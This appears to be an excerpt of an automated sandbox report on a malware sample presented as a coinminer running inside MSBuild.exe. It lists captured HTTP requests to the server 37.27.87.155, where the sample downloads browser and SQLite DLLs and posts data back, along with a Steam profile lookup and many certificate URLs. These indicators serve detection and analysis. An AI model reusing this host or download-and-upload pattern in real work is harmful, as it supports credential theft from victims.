                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00404500
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: unknownDNS traffic detected: queries for: steamcommunity.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: MSBuild.exe, 00000001.00000002.2149153992.000000001997D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://37.27.87.155
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/1
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/1;W
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/27.87.155/nss3.dll
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/9
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/B
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/D
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/MgrI
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ets
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dll(
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/freebl3.dllV
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dlln
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/mozglue.dllz
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/msvcp140.dll
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nd-point:
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/nss3.dll
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/r
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/ramData
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/softokn3.dll
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/sqln.dll
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/sqln.dll#
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/sqln.dll:
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155/vcruntime140.dll
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155AKKFH
                        Source: MSBuild.exe, 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.87.155GHCBG
                        Source: DBKKKEHD.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                        Source: DBKKKEHD.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: DBKKKEHD.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: DBKKKEHD.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=N0D1
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jU8h8CqVh6FY&l=e
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
